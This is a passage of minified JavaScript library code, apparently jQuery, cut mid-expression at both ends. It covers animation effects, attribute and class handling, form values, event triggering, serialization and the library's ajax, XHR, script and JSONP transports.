1!==e.elem.nodeType||null!=e.elem[e.prop]&&null==e.elem.style[e.prop]?e.elem[e.prop]:(t=w.css(e.elem,e.prop,""))&&"auto"!==t?t:0},set:function(e){w.fx.step[e.prop]?w.fx.step[e.prop](e):1!==e.elem.nodeType||null==e.elem.style[w.cssProps[e.prop]]&&!w.cssHooks[e.prop]?e.elem[e.prop]=e.now:w.style(e.elem,e.prop,e.now+e.unit)}}},tt.propHooks.scrollTop=tt.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},w.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2},_default:"swing"},w.fx=tt.prototype.init,w.fx.step={};var nt,rt,it=/^(?:toggle|show|hide)$/,ot=/queueHooks$/;function at(){rt&&(!1===r.hidden&&e.requestAnimationFrame?e.requestAnimationFrame(at):e.setTimeout(at,w.fx.interval),w.fx.tick())}function st(){return e.setTimeout(function(){nt=void 0}),nt=Date.now()}function ut(e,t){var n,r=0,i={height:e};for(t=t?1:0;r<4;r+=2-t)i["margin"+(n=oe[r])]=i["padding"+n]=e;return t&&(i.opacity=i.width=e),i}function lt(e,t,n){for(var r,i=(pt.tweeners[t]||[]).concat(pt.tweeners["*"]),o=0,a=i.length;o<a;o++)if(r=i[o].call(n,t,e))return r}function ct(e,t,n){var r,i,o,a,s,u,l,c,f="width"in t||"height"in t,p=this,d={},h=e.style,g=e.nodeType&&ae(e),y=J.get(e,"fxshow");n.queue||(null==(a=w._queueHooks(e,"fx")).unqueued&&(a.unqueued=0,s=a.empty.fire,a.empty.fire=function(){a.unqueued||s()}),a.unqueued++,p.always(function(){p.always(function(){a.unqueued--,w.queue(e,"fx").length||a.empty.fire()})}));for(r in t)if(i=t[r],it.test(i)){if(delete t[r],o=o||"toggle"===i,i===(g?"hide":"show")){if("show"!==i||!y||void 0===y[r])continue;g=!0}d[r]=y&&y[r]||w.style(e,r)}if((u=!w.isEmptyObject(t))||!w.isEmptyObject(d)){f&&1===e.nodeType&&(n.overflow=[h.overflow,h.overflowX,h.overflowY],null==(l=y&&y.display)&&(l=J.get(e,"display")),"none"===(c=w.css(e,"display"))&&(l?c=l:(fe([e],!0),l=e.style.display||l,c=w.css(e,"display"),fe([e]))),("inline"===c||"inline-block"===c&&null!=l)&&"none"===w.css(e,"float")&&(u||(p.done(function(){h.display=l}),null==l&&(c=h.display,l="none"===c?"":c)),h.display="inline-block")),n.overflow&&(h.overflow="hidden",p.always(function(){h.overflow=n.overflow[0],h.overflowX=n.overflow[1],h.overflowY=n.overflow[2]})),u=!1;for(r in d)u||(y?"hidden"in y&&(g=y.hidden):y=J.access(e,"fxshow",{display:l}),o&&(y.hidden=!g),g&&fe([e],!0),p.done(function(){g||fe([e]),J.remove(e,"fxshow");for(r in d)w.style(e,r,d[r])})),u=lt(g?y[r]:0,r,p),r in y||(y[r]=u.start,g&&(u.end=u.start,u.start=0))}}function ft(e,t){var n,r,i,o,a;for(n in e)if(r=G(n),i=t[r],o=e[n],Array.isArray(o)&&(i=o[1],o=e[n]=o[0]),n!==r&&(e[r]=o,delete e[n]),(a=w.cssHooks[r])&&"expand"in a){o=a.expand(o),delete e[r];for(n in o)n in e||(e[n]=o[n],t[n]=i)}else t[r]=i}function pt(e,t,n){var r,i,o=0,a=pt.prefilters.length,s=w.Deferred().always(function(){delete u.elem}),u=function(){if(i)return!1;for(var t=nt||st(),n=Math.max(0,l.startTime+l.duration-t),r=1-(n/l.duration||0),o=0,a=l.tweens.length;o<a;o++)l.tweens[o].run(r);return s.notifyWith(e,[l,r,n]),r<1&&a?n:(a||s.notifyWith(e,[l,1,0]),s.resolveWith(e,[l]),!1)},l=s.promise({elem:e,props:w.extend({},t),opts:w.extend(!0,{specialEasing:{},easing:w.easing._default},n),originalProperties:t,originalOptions:n,startTime:nt||st(),duration:n.duration,tweens:[],createTween:function(t,n){var r=w.Tween(e,l.opts,t,n,l.opts.specialEasing[t]||l.opts.easing);return l.tweens.push(r),r},stop:function(t){var n=0,r=t?l.tweens.length:0;if(i)return this;for(i=!0;n<r;n++)l.tweens[n].run(1);return t?(s.notifyWith(e,[l,1,0]),s.resolveWith(e,[l,t])):s.rejectWith(e,[l,t]),this}}),c=l.props;for(ft(c,l.opts.specialEasing);o<a;o++)if(r=pt.prefilters[o].call(l,e,c,l.opts))return g(r.stop)&&(w._queueHooks(l.elem,l.opts.queue).stop=r.stop.bind(r)),r;return w.map(c,lt,l),g(l.opts.start)&&l.opts.start.call(e,l),l.progress(l.opts.progress).done(l.opts.done,l.opts.complete).fail(l.opts.fail).always(l.opts.always),w.fx.timer(w.extend(u,{elem:e,anim:l,queue:l.opts.queue})),l}w.Animation=w.extend(pt,{tweeners:{"*":[function(e,t){var n=this.createTween(e,t);return ue(n.elem,e,ie.exec(t),n),n}]},tweener:function(e,t){g(e)?(t=e,e=["*"]):e=e.match(M);for(var n,r=0,i=e.length;r<i;r++)n=e[r],pt.tweeners[n]=pt.tweeners[n]||[],pt.tweeners[n].unshift(t)},prefilters:[ct],prefilter:function(e,t){t?pt.prefilters.unshift(e):pt.prefilters.push(e)}}),w.speed=function(e,t,n){var r=e&&"object"==typeof e?w.extend({},e):{complete:n||!n&&t||g(e)&&e,duration:e,easing:n&&t||t&&!g(t)&&t};return w.fx.off?r.duration=0:"number"!=typeof r.duration&&(r.duration in w.fx.speeds?r.duration=w.fx.speeds[r.duration]:r.duration=w.fx.speeds._default),null!=r.queue&&!0!==r.queue||(r.queue="fx"),r.old=r.complete,r.complete=function(){g(r.old)&&r.old.call(this),r.queue&&w.dequeue(this,r.queue)},r},w.fn.extend({fadeTo:function(e,t,n,r){return this.filter(ae).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=w.isEmptyObject(e),o=w.speed(t,n,r),a=function(){var t=pt(this,w.extend({},e),o);(i||J.get(this,"finish"))&&t.stop(!0)};return a.finish=a,i||!1===o.queue?this.each(a):this.queue(o.queue,a)},stop:function(e,t,n){var r=function(e){var t=e.stop;delete e.stop,t(n)};return"string"!=typeof e&&(n=t,t=e,e=void 0),t&&!1!==e&&this.queue(e||"fx",[]),this.each(function(){var t=!0,i=null!=e&&e+"queueHooks",o=w.timers,a=J.get(this);if(i)a[i]&&a[i].stop&&r(a[i]);else for(i in a)a[i]&&a[i].stop&&ot.test(i)&&r(a[i]);for(i=o.length;i--;)o[i].elem!==this||null!=e&&o[i].queue!==e||(o[i].anim.stop(n),t=!1,o.splice(i,1));!t&&n||w.dequeue(this,e)})},finish:function(e){return!1!==e&&(e=e||"fx"),this.each(function(){var t,n=J.get(this),r=n[e+"queue"],i=n[e+"queueHooks"],o=w.timers,a=r?r.length:0;for(n.finish=!0,w.queue(this,e,[]),i&&i.stop&&i.stop.call(this,!0),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;t<a;t++)r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}}),w.each(["toggle","show","hide"],function(e,t){var n=w.fn[t];w.fn[t]=function(e,r,i){return null==e||"boolean"==typeof e?n.apply(this,arguments):this.animate(ut(t,!0),e,r,i)}}),w.each({slideDown:ut("show"),slideUp:ut("hide"),slideToggle:ut("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){w.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),w.timers=[],w.fx.tick=function(){var e,t=0,n=w.timers;for(nt=Date.now();t<n.length;t++)(e=n[t])()||n[t]!==e||n.splice(t--,1);n.length||w.fx.stop(),nt=void 0},w.fx.timer=function(e){w.timers.push(e),w.fx.start()},w.fx.interval=13,w.fx.start=function(){rt||(rt=!0,at())},w.fx.stop=function(){rt=null},w.fx.speeds={slow:600,fast:200,_default:400},w.fn.delay=function(t,n){return t=w.fx?w.fx.speeds[t]||t:t,n=n||"fx",this.queue(n,function(n,r){var i=e.setTimeout(n,t);r.stop=function(){e.clearTimeout(i)}})},function(){var e=r.createElement("input"),t=r.createElement("select").appendChild(r.createElement("option"));e.type="checkbox",h.checkOn=""!==e.value,h.optSelected=t.selected,(e=r.createElement("input")).value="t",e.type="radio",h.radioValue="t"===e.value}();var dt,ht=w.expr.attrHandle;w.fn.extend({attr:function(e,t){return z(this,w.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){w.removeAttr(this,e)})}}),w.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?w.prop(e,t,n):(1===o&&w.isXMLDoc(e)||(i=w.attrHooks[t.toLowerCase()]||(w.expr.match.bool.test(t)?dt:void 0)),void 0!==n?null===n?void w.removeAttr(e,t):i&&"set"in i&&void 0!==(r=i.set(e,n,t))?r:(e.setAttribute(t,n+""),n):i&&"get"in i&&null!==(r=i.get(e,t))?r:null==(r=w.find.attr(e,t))?void 0:r)},attrHooks:{type:{set:function(e,t){if(!h.radioValue&&"radio"===t&&N(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},removeAttr:function(e,t){var n,r=0,i=t&&t.match(M);if(i&&1===e.nodeType)while(n=i[r++])e.removeAttribute(n)}}),dt={set:function(e,t,n){return!1===t?w.removeAttr(e,n):e.setAttribute(n,n),n}},w.each(w.expr.match.bool.source.match(/\w+/g),function(e,t){var n=ht[t]||w.find.attr;ht[t]=function(e,t,r){var i,o,a=t.toLowerCase();return r||(o=ht[a],ht[a]=i,i=null!=n(e,t,r)?a:null,ht[a]=o),i}});var gt=/^(?:input|select|textarea|button)$/i,yt=/^(?:a|area)$/i;w.fn.extend({prop:function(e,t){return z(this,w.prop,e,t,arguments.length>1)},removeProp:function(e){return this.each(function(){delete this[w.propFix[e]||e]})}}),w.extend({prop:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return 1===o&&w.isXMLDoc(e)||(t=w.propFix[t]||t,i=w.propHooks[t]),void 0!==n?i&&"set"in i&&void 0!==(r=i.set(e,n,t))?r:e[t]=n:i&&"get"in i&&null!==(r=i.get(e,t))?r:e[t]},propHooks:{tabIndex:{get:function(e){var t=w.find.attr(e,"tabindex");return t?parseInt(t,10):gt.test(e.nodeName)||yt.test(e.nodeName)&&e.href?0:-1}}},propFix:{"for":"htmlFor","class":"className"}}),h.optSelected||(w.propHooks.selected={get:function(e){var t=e.parentNode;return t&&t.parentNode&&t.parentNode.selectedIndex,null},set:function(e){var t=e.parentNode;t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex)}}),w.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){w.propFix[this.toLowerCase()]=this});function vt(e){return(e.match(M)||[]).join(" ")}function mt(e){return e.getAttribute&&e.getAttribute("class")||""}function xt(e){return Array.isArray(e)?e:"string"==typeof e?e.match(M)||[]:[]}w.fn.extend({addClass:function(e){var t,n,r,i,o,a,s,u=0;if(g(e))return this.each(function(t){w(this).addClass(e.call(this,t,mt(this)))});if((t=xt(e)).length)while(n=this[u++])if(i=mt(n),r=1===n.nodeType&&" "+vt(i)+" "){a=0;while(o=t[a++])r.indexOf(" "+o+" ")<0&&(r+=o+" ");i!==(s=vt(r))&&n.setAttribute("class",s)}return this},removeClass:function(e){var t,n,r,i,o,a,s,u=0;if(g(e))return this.each(function(t){w(this).removeClass(e.call(this,t,mt(this)))});if(!arguments.length)return this.attr("class","");if((t=xt(e)).length)while(n=this[u++])if(i=mt(n),r=1===n.nodeType&&" "+vt(i)+" "){a=0;while(o=t[a++])while(r.indexOf(" "+o+" ")>-1)r=r.replace(" "+o+" "," ");i!==(s=vt(r))&&n.setAttribute("class",s)}return this},toggleClass:function(e,t){var n=typeof e,r="string"===n||Array.isArray(e);return"boolean"==typeof t&&r?t?this.addClass(e):this.removeClass(e):g(e)?this.each(function(n){w(this).toggleClass(e.call(this,n,mt(this),t),t)}):this.each(function(){var t,i,o,a;if(r){i=0,o=w(this),a=xt(e);while(t=a[i++])o.hasClass(t)?o.removeClass(t):o.addClass(t)}else void 0!==e&&"boolean"!==n||((t=mt(this))&&J.set(this,"__className__",t),this.setAttribute&&this.setAttribute("class",t||!1===e?"":J.get(this,"__className__")||""))})},hasClass:function(e){var t,n,r=0;t=" "+e+" ";while(n=this[r++])if(1===n.nodeType&&(" "+vt(mt(n))+" ").indexOf(t)>-1)return!0;return!1}});var bt=/\r/g;w.fn.extend({val:function(e){var t,n,r,i=this[0];{if(arguments.length)return r=g(e),this.each(function(n){var i;1===this.nodeType&&(null==(i=r?e.call(this,n,w(this).val()):e)?i="":"number"==typeof i?i+="":Array.isArray(i)&&(i=w.map(i,function(e){return null==e?"":e+""})),(t=w.valHooks[this.type]||w.valHooks[this.nodeName.toLowerCase()])&&"set"in t&&void 0!==t.set(this,i,"value")||(this.value=i))});if(i)return(t=w.valHooks[i.type]||w.valHooks[i.nodeName.toLowerCase()])&&"get"in t&&void 0!==(n=t.get(i,"value"))?n:"string"==typeof(n=i.value)?n.replace(bt,""):null==n?"":n}}}),w.extend({valHooks:{option:{get:function(e){var t=w.find.attr(e,"value");return null!=t?t:vt(w.text(e))}},select:{get:function(e){var t,n,r,i=e.options,o=e.selectedIndex,a="select-one"===e.type,s=a?null:[],u=a?o+1:i.length;for(r=o<0?u:a?o:0;r<u;r++)if(((n=i[r]).selected||r===o)&&!n.disabled&&(!n.parentNode.disabled||!N(n.parentNode,"optgroup"))){if(t=w(n).val(),a)return t;s.push(t)}return s},set:function(e,t){var n,r,i=e.options,o=w.makeArray(t),a=i.length;while(a--)((r=i[a]).selected=w.inArray(w.valHooks.option.get(r),o)>-1)&&(n=!0);return n||(e.selectedIndex=-1),o}}}}),w.each(["radio","checkbox"],function(){w.valHooks[this]={set:function(e,t){if(Array.isArray(t))return e.checked=w.inArray(w(e).val(),t)>-1}},h.checkOn||(w.valHooks[this].get=function(e){return null===e.getAttribute("value")?"on":e.value})}),h.focusin="onfocusin"in e;var wt=/^(?:focusinfocus|focusoutblur)$/,Tt=function(e){e.stopPropagation()};w.extend(w.event,{trigger:function(t,n,i,o){var a,s,u,l,c,p,d,h,v=[i||r],m=f.call(t,"type")?t.type:t,x=f.call(t,"namespace")?t.namespace.split("."):[];if(s=h=u=i=i||r,3!==i.nodeType&&8!==i.nodeType&&!wt.test(m+w.event.triggered)&&(m.indexOf(".")>-1&&(m=(x=m.split(".")).shift(),x.sort()),c=m.indexOf(":")<0&&"on"+m,t=t[w.expando]?t:new w.Event(m,"object"==typeof t&&t),t.isTrigger=o?2:3,t.namespace=x.join("."),t.rnamespace=t.namespace?new RegExp("(^|\\.)"+x.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,t.result=void 0,t.target||(t.target=i),n=null==n?[t]:w.makeArray(n,[t]),d=w.event.special[m]||{},o||!d.trigger||!1!==d.trigger.apply(i,n))){if(!o&&!d.noBubble&&!y(i)){for(l=d.delegateType||m,wt.test(l+m)||(s=s.parentNode);s;s=s.parentNode)v.push(s),u=s;u===(i.ownerDocument||r)&&v.push(u.defaultView||u.parentWindow||e)}a=0;while((s=v[a++])&&!t.isPropagationStopped())h=s,t.type=a>1?l:d.bindType||m,(p=(J.get(s,"events")||{})[t.type]&&J.get(s,"handle"))&&p.apply(s,n),(p=c&&s[c])&&p.apply&&Y(s)&&(t.result=p.apply(s,n),!1===t.result&&t.preventDefault());return t.type=m,o||t.isDefaultPrevented()||d._default&&!1!==d._default.apply(v.pop(),n)||!Y(i)||c&&g(i[m])&&!y(i)&&((u=i[c])&&(i[c]=null),w.event.triggered=m,t.isPropagationStopped()&&h.addEventListener(m,Tt),i[m](),t.isPropagationStopped()&&h.removeEventListener(m,Tt),w.event.triggered=void 0,u&&(i[c]=u)),t.result}},simulate:function(e,t,n){var r=w.extend(new w.Event,n,{type:e,isSimulated:!0});w.event.trigger(r,null,t)}}),w.fn.extend({trigger:function(e,t){return this.each(function(){w.event.trigger(e,t,this)})},triggerHandler:function(e,t){var n=this[0];if(n)return w.event.trigger(e,t,n,!0)}}),h.focusin||w.each({focus:"focusin",blur:"focusout"},function(e,t){var n=function(e){w.event.simulate(t,e.target,w.event.fix(e))};w.event.special[t]={setup:function(){var r=this.ownerDocument||this,i=J.access(r,t);i||r.addEventListener(e,n,!0),J.access(r,t,(i||0)+1)},teardown:function(){var r=this.ownerDocument||this,i=J.access(r,t)-1;i?J.access(r,t,i):(r.removeEventListener(e,n,!0),J.remove(r,t))}}});var Ct=e.location,Et=Date.now(),kt=/\?/;w.parseXML=function(t){var n;if(!t||"string"!=typeof t)return null;try{n=(new e.DOMParser).parseFromString(t,"text/xml")}catch(e){n=void 0}return n&&!n.getElementsByTagName("parsererror").length||w.error("Invalid XML: "+t),n};var St=/\[\]$/,Dt=/\r?\n/g,Nt=/^(?:submit|button|image|reset|file)$/i,At=/^(?:input|select|textarea|keygen)/i;function jt(e,t,n,r){var i;if(Array.isArray(t))w.each(t,function(t,i){n||St.test(e)?r(e,i):jt(e+"["+("object"==typeof i&&null!=i?t:"")+"]",i,n,r)});else if(n||"object"!==x(t))r(e,t);else for(i in t)jt(e+"["+i+"]",t[i],n,r)}w.param=function(e,t){var n,r=[],i=function(e,t){var n=g(t)?t():t;r[r.length]=encodeURIComponent(e)+"="+encodeURIComponent(null==n?"":n)};if(Array.isArray(e)||e.jquery&&!w.isPlainObject(e))w.each(e,function(){i(this.name,this.value)});else for(n in e)jt(n,e[n],t,i);return r.join("&")},w.fn.extend({serialize:function(){return w.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=w.prop(this,"elements");return e?w.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!w(this).is(":disabled")&&At.test(this.nodeName)&&!Nt.test(e)&&(this.checked||!pe.test(e))}).map(function(e,t){var n=w(this).val();return null==n?null:Array.isArray(n)?w.map(n,function(e){return{name:t.name,value:e.replace(Dt,"\r\n")}}):{name:t.name,value:n.replace(Dt,"\r\n")}}).get()}});var qt=/%20/g,Lt=/#.*$/,Ht=/([?&])_=[^&]*/,Ot=/^(.*?):[ \t]*([^\r\n]*)$/gm,Pt=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Mt=/^(?:GET|HEAD)$/,Rt=/^\/\//,It={},Wt={},$t="*/".concat("*"),Bt=r.createElement("a");Bt.href=Ct.href;function Ft(e){return function(t,n){"string"!=typeof t&&(n=t,t="*");var r,i=0,o=t.toLowerCase().match(M)||[];if(g(n))while(r=o[i++])"+"===r[0]?(r=r.slice(1)||"*",(e[r]=e[r]||[]).unshift(n)):(e[r]=e[r]||[]).push(n)}}function _t(e,t,n,r){var i={},o=e===Wt;function a(s){var u;return i[s]=!0,w.each(e[s]||[],function(e,s){var l=s(t,n,r);return"string"!=typeof l||o||i[l]?o?!(u=l):void 0:(t.dataTypes.unshift(l),a(l),!1)}),u}return a(t.dataTypes[0])||!i["*"]&&a("*")}function zt(e,t){var n,r,i=w.ajaxSettings.flatOptions||{};for(n in t)void 0!==t[n]&&((i[n]?e:r||(r={}))[n]=t[n]);return r&&w.extend(!0,e,r),e}function Xt(e,t,n){var r,i,o,a,s=e.contents,u=e.dataTypes;while("*"===u[0])u.shift(),void 0===r&&(r=e.mimeType||t.getResponseHeader("Content-Type"));if(r)for(i in s)if(s[i]&&s[i].test(r)){u.unshift(i);break}if(u[0]in n)o=u[0];else{for(i in n){if(!u[0]||e.converters[i+" "+u[0]]){o=i;break}a||(a=i)}o=o||a}if(o)return o!==u[0]&&u.unshift(o),n[o]}function Ut(e,t,n,r){var i,o,a,s,u,l={},c=e.dataTypes.slice();if(c[1])for(a in e.converters)l[a.toLowerCase()]=e.converters[a];o=c.shift();while(o)if(e.responseFields[o]&&(n[e.responseFields[o]]=t),!u&&r&&e.dataFilter&&(t=e.dataFilter(t,e.dataType)),u=o,o=c.shift())if("*"===o)o=u;else if("*"!==u&&u!==o){if(!(a=l[u+" "+o]||l["* "+o]))for(i in l)if((s=i.split(" "))[1]===o&&(a=l[u+" "+s[0]]||l["* "+s[0]])){!0===a?a=l[i]:!0!==l[i]&&(o=s[0],c.unshift(s[1]));break}if(!0!==a)if(a&&e["throws"])t=a(t);else try{t=a(t)}catch(e){return{state:"parsererror",error:a?e:"No conversion from "+u+" to "+o}}}return{state:"success",data:t}}w.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:Ct.href,type:"GET",isLocal:Pt.test(Ct.protocol),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":$t,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/\bxml\b/,html:/\bhtml/,json:/\bjson\b/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":JSON.parse,"text xml":w.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?zt(zt(e,w.ajaxSettings),t):zt(w.ajaxSettings,e)},ajaxPrefilter:Ft(It),ajaxTransport:Ft(Wt),ajax:function(t,n){"object"==typeof t&&(n=t,t=void 0),n=n||{};var i,o,a,s,u,l,c,f,p,d,h=w.ajaxSetup({},n),g=h.context||h,y=h.context&&(g.nodeType||g.jquery)?w(g):w.event,v=w.Deferred(),m=w.Callbacks("once memory"),x=h.statusCode||{},b={},T={},C="canceled",E={readyState:0,getResponseHeader:function(e){var t;if(c){if(!s){s={};while(t=Ot.exec(a))s[t[1].toLowerCase()]=t[2]}t=s[e.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return c?a:null},setRequestHeader:function(e,t){return null==c&&(e=T[e.toLowerCase()]=T[e.toLowerCase()]||e,b[e]=t),this},overrideMimeType:function(e){return null==c&&(h.mimeType=e),this},statusCode:function(e){var t;if(e)if(c)E.always(e[E.status]);else for(t in e)x[t]=[x[t],e[t]];return this},abort:function(e){var t=e||C;return i&&i.abort(t),k(0,t),this}};if(v.promise(E),h.url=((t||h.url||Ct.href)+"").replace(Rt,Ct.protocol+"//"),h.type=n.method||n.type||h.method||h.type,h.dataTypes=(h.dataType||"*").toLowerCase().match(M)||[""],null==h.crossDomain){l=r.createElement("a");try{l.href=h.url,l.href=l.href,h.crossDomain=Bt.protocol+"//"+Bt.host!=l.protocol+"//"+l.host}catch(e){h.crossDomain=!0}}if(h.data&&h.processData&&"string"!=typeof h.data&&(h.data=w.param(h.data,h.traditional)),_t(It,h,n,E),c)return E;(f=w.event&&h.global)&&0==w.active++&&w.event.trigger("ajaxStart"),h.type=h.type.toUpperCase(),h.hasContent=!Mt.test(h.type),o=h.url.replace(Lt,""),h.hasContent?h.data&&h.processData&&0===(h.contentType||"").indexOf("application/x-www-form-urlencoded")&&(h.data=h.data.replace(qt,"+")):(d=h.url.slice(o.length),h.data&&(h.processData||"string"==typeof h.data)&&(o+=(kt.test(o)?"&":"?")+h.data,delete h.data),!1===h.cache&&(o=o.replace(Ht,"$1"),d=(kt.test(o)?"&":"?")+"_="+Et+++d),h.url=o+d),h.ifModified&&(w.lastModified[o]&&E.setRequestHeader("If-Modified-Since",w.lastModified[o]),w.etag[o]&&E.setRequestHeader("If-None-Match",w.etag[o])),(h.data&&h.hasContent&&!1!==h.contentType||n.contentType)&&E.setRequestHeader("Content-Type",h.contentType),E.setRequestHeader("Accept",h.dataTypes[0]&&h.accepts[h.dataTypes[0]]?h.accepts[h.dataTypes[0]]+("*"!==h.dataTypes[0]?", "+$t+"; q=0.01":""):h.accepts["*"]);for(p in h.headers)E.setRequestHeader(p,h.headers[p]);if(h.beforeSend&&(!1===h.beforeSend.call(g,E,h)||c))return E.abort();if(C="abort",m.add(h.complete),E.done(h.success),E.fail(h.error),i=_t(Wt,h,n,E)){if(E.readyState=1,f&&y.trigger("ajaxSend",[E,h]),c)return E;h.async&&h.timeout>0&&(u=e.setTimeout(function(){E.abort("timeout")},h.timeout));try{c=!1,i.send(b,k)}catch(e){if(c)throw e;k(-1,e)}}else k(-1,"No Transport");function k(t,n,r,s){var l,p,d,b,T,C=n;c||(c=!0,u&&e.clearTimeout(u),i=void 0,a=s||"",E.readyState=t>0?4:0,l=t>=200&&t<300||304===t,r&&(b=Xt(h,E,r)),b=Ut(h,b,E,l),l?(h.ifModified&&((T=E.getResponseHeader("Last-Modified"))&&(w.lastModified[o]=T),(T=E.getResponseHeader("etag"))&&(w.etag[o]=T)),204===t||"HEAD"===h.type?C="nocontent":304===t?C="notmodified":(C=b.state,p=b.data,l=!(d=b.error))):(d=C,!t&&C||(C="error",t<0&&(t=0))),E.status=t,E.statusText=(n||C)+"",l?v.resolveWith(g,[p,C,E]):v.rejectWith(g,[E,C,d]),E.statusCode(x),x=void 0,f&&y.trigger(l?"ajaxSuccess":"ajaxError",[E,h,l?p:d]),m.fireWith(g,[E,C]),f&&(y.trigger("ajaxComplete",[E,h]),--w.active||w.event.trigger("ajaxStop")))}return E},getJSON:function(e,t,n){return w.get(e,t,n,"json")},getScript:function(e,t){return w.get(e,void 0,t,"script")}}),w.each(["get","post"],function(e,t){w[t]=function(e,n,r,i){return g(n)&&(i=i||r,r=n,n=void 0),w.ajax(w.extend({url:e,type:t,dataType:i,data:n,success:r},w.isPlainObject(e)&&e))}}),w._evalUrl=function(e){return w.ajax({url:e,type:"GET",dataType:"script",cache:!0,async:!1,global:!1,"throws":!0})},w.fn.extend({wrapAll:function(e){var t;return this[0]&&(g(e)&&(e=e.call(this[0])),t=w(e,this[0].ownerDocument).eq(0).clone(!0),this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstElementChild)e=e.firstElementChild;return e}).append(this)),this},wrapInner:function(e){return g(e)?this.each(function(t){w(this).wrapInner(e.call(this,t))}):this.each(function(){var t=w(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=g(e);return this.each(function(n){w(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(e){return this.parent(e).not("body").each(function(){w(this).replaceWith(this.childNodes)}),this}}),w.expr.pseudos.hidden=function(e){return!w.expr.pseudos.visible(e)},w.expr.pseudos.visible=function(e){return!!(e.offsetWidth||e.offsetHeight||e.getClientRects().length)},w.ajaxSettings.xhr=function(){try{return new e.XMLHttpRequest}catch(e){}};var Vt={0:200,1223:204},Gt=w.ajaxSettings.xhr();h.cors=!!Gt&&"withCredentials"in Gt,h.ajax=Gt=!!Gt,w.ajaxTransport(function(t){var n,r;if(h.cors||Gt&&!t.crossDomain)return{send:function(i,o){var a,s=t.xhr();if(s.open(t.type,t.url,t.async,t.username,t.password),t.xhrFields)for(a in t.xhrFields)s[a]=t.xhrFields[a];t.mimeType&&s.overrideMimeType&&s.overrideMimeType(t.mimeType),t.crossDomain||i["X-Requested-With"]||(i["X-Requested-With"]="XMLHttpRequest");for(a in i)s.setRequestHeader(a,i[a]);n=function(e){return function(){n&&(n=r=s.onload=s.onerror=s.onabort=s.ontimeout=s.onreadystatechange=null,"abort"===e?s.abort():"error"===e?"number"!=typeof s.status?o(0,"error"):o(s.status,s.statusText):o(Vt[s.status]||s.status,s.statusText,"text"!==(s.responseType||"text")||"string"!=typeof s.responseText?{binary:s.response}:{text:s.responseText},s.getAllResponseHeaders()))}},s.onload=n(),r=s.onerror=s.ontimeout=n("error"),void 0!==s.onabort?s.onabort=r:s.onreadystatechange=function(){4===s.readyState&&e.setTimeout(function(){n&&r()})},n=n("abort");try{s.send(t.hasContent&&t.data||null)}catch(e){if(n)throw e}},abort:function(){n&&n()}}}),w.ajaxPrefilter(function(e){e.crossDomain&&(e.contents.script=!1)}),w.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/\b(?:java|ecma)script\b/},converters:{"text script":function(e){return w.globalEval(e),e}}}),w.ajaxPrefilter("script",function(e){void 0===e.cache&&(e.cache=!1),e.crossDomain&&(e.type="GET")}),w.ajaxTransport("script",function(e){if(e.crossDomain){var t,n;return{send:function(i,o){t=w("<script>").prop({charset:e.scriptCharset,src:e.url}).on("load error",n=function(e){t.remove(),n=null,e&&o("error"===e.type?404:200,e.type)}),r.head.appendChild(t[0])},abort:function(){n&&n()}}}});var Yt=[],Qt=/(=)\?(?=&|$)|\?\?/;w.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Yt.pop()||w.expando+"_"+Et++;return this[e]=!0,e}}),w.ajaxPrefilter("json jsonp",function(t,n,r){var i,o,a,s=!1!==t.jsonp&&(Qt.test(t.url)?"url":"string"==typeof t.data&&0===(t.contentType||"").indexOf("application/x-www-form-urlencoded")&&Qt.test(t.data)&&"data");if(s||"jsonp"===t.dataTypes[0])return i=t.jsonpCallback=g(t.jsonpCallback)?t.jsonpCallback():t.jsonpCallback,s?t[s]=t[s].replace(Qt,"$1"+i):!1!==t.jsonp&&(t.url+=(kt.test(t.url)?"&":"?")+t.jsonp+"="+i),t.converters["script json"]=function(){return a||w.error(i+" was not called"),a[0]},t.dataTypes[0]="json",o=e[i],e[i]=function(){a=arguments},r.always(function(){void 0===o?w(e).removeProp(i):e[i]=o,t[i]&&(t.jsonpCallback=n.jsonpCallback,Yt.push(i)),a&&g(o)&&o(a[0]),a=o=void 0}),"script"}),h.createHTMLDocument=function(){var e=r.implementation.createHTMLDocument("").body;return e.innerHTML="<form></form><form></form>",2===e.childNodes.length}(),w.parseHTML=function(e,t,n){if("string"!=typeof e)return[];"boolean"==typeof t&&(n=t,t=!1);var i,o,a;return 